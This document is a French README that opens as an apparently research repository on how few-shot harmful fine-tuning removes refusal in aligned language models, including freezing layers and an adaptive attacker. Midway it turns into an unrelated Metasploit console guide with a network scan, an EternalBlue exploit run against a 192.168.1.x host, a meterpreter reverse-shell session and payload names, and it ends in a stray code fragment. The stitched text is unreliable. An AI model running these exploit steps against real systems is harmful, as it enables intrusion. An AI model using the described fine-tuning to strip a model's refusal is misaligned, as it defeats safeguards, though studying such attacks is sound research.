
Le refus se localise, le dommage se déplace, les couches de sécurité sous un fine-tuning à quelques échantillons
Démarrage rapide · Utilisation · CLI · Résultats · Reproduire · FAQ · Citation
Quelques dizaines d'exemples nuisibles peuvent supprimer le refus d'un modèle aligné face à des requêtes nuisibles. Des travaux antérieurs localisent la sécurité à des couches et directions spécifiques, ce qui suggère de protéger l'endroit qui a été trouvé. Ce dépôt teste cette prémisse comme le ferait un attaquant adaptatif. Il trouve où le refus peut être récupéré, gèle cette région et attaque à nouveau, puis il répare la mise à jour des poids et laisse ensuite l'attaquant la propager.
L'étude repose sur trois mesures.
Ce dépôt constitue la mesure et les deux défenses sous forme de petite bibliothèque, ainsi que les enregistrements d'exécution et les scripts qui reconstruisent les tableaux de l'article.
(a) Le patchage d'activation en verrouillage écrase la sortie de couche du modèle compromis par l'état propre au préremplissage et à chaque étape de décodage. (b) Dans l'attaque appariée sur Llama, geler les couches 0–17 décale la transition à mi-plafond de 15 à 27–28.
pip install "git+https://github.com/js-lee-AI/refusal-relocates.git"
| **Commande** | **Description** |
|--------------|-----------------|
| `list` | Liste tous les modules disponibles |
| `search <keyword>` | Recherche des modules par mot-clé |
| `use <module>` | Sélectionne un module pour l'utiliser |
| `info` | Affiche des informations détaillées sur le module sélectionné |
| `options` | Affiche les options configurables du module sélectionné |
| `set <option> <value>` | Définit une option pour le module sélectionné |
| `run` / `exploit` | Exécute le module sélectionné |
| `back` | Désélectionne le module en cours |
| `sessions` | Liste les sessions actives |
| `interact <id>` | Interagit avec une session active |
| `jobs` | Liste les jobs en arrière-plan |
| `kill <id>` | Termine un job ou une session |
| `resource <file>` | Exécute un script de ressources |
| `reload` | Recharge tous les modules |
| `banner` | Affiche la bannière de l'outil |
| `clear` | Efface l'écran du terminal |
| `history` | Affiche l'historique des commandes |
| `help` | Affiche le menu d'aide |
| `exit` / `quit` | Quitte la console |
### Exemples d'utilisation
#### Scanner un réseau
msf6 > use auxiliary/scanner/portscan/tcp msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1000 PORTS => 1-1000 msf6 auxiliary(scanner/portscan/tcp) > run
#### Exploiter une cible
msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10 RHOSTS => 192.168.1.10 msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.5 LHOST => 192.168.1.5 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
#### Gérer les sessions
msf6 > sessions -l
Id Nom Type Information Connexion
1 meterpreter x64/windows WIN-7\Administrator @ WIN-7 192.168.1.5:4444 -> 192.168.1.10:49158
msf6 > sessions -i 1 [*] Démarrage de l'interaction avec 1... meterpreter >
### Modules courants
| **Module** | **Description** |
|------------|-----------------|
| `auxiliary/scanner/portscan/tcp` | Scanner TCP |
| `auxiliary/scanner/smb/smb_version` | Détection de version SMB |
| `exploit/windows/smb/ms17_010_eternalblue` | Exploit EternalBlue (MS17-010) |
| `exploit/multi/handler` | Gestionnaire de payload générique |
| `post/multi/gather/env` | Collecte des variables d'environnement |
| `payload/windows/x64/meterpreter/reverse_tcp` | Payload Meterpreter Windows x64 |
### Bonnes pratiques
- Toujours obtenir une autorisation écrite avant de tester un système.
- Utiliser un environnement isolé (lab, VM) pour les tests.
- Documenter chaque étape de l'évaluation.
- Ne jamais laisser une session ouverte sans surveillance.
- Mettre à jour régulièrement le framework et ses modules.
### Ressources
- [Documentation officielle](https://docs.metasploit.com/)
- [Dépôt GitHub](https://github.com/rapid7/metasploit-framework)
- [Blog Rapid7](https://www.rapid7.com/blog/)
- [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/)
### Licence
Ce projet est distribué sous licence BSD-3-Clause. Consultez le fichier [LICENSE](https://github.com/js-lee-ai/refusal-relocates/blob/main/LICENSE) pour plus d'informations.```python
import numpy as np
import refusal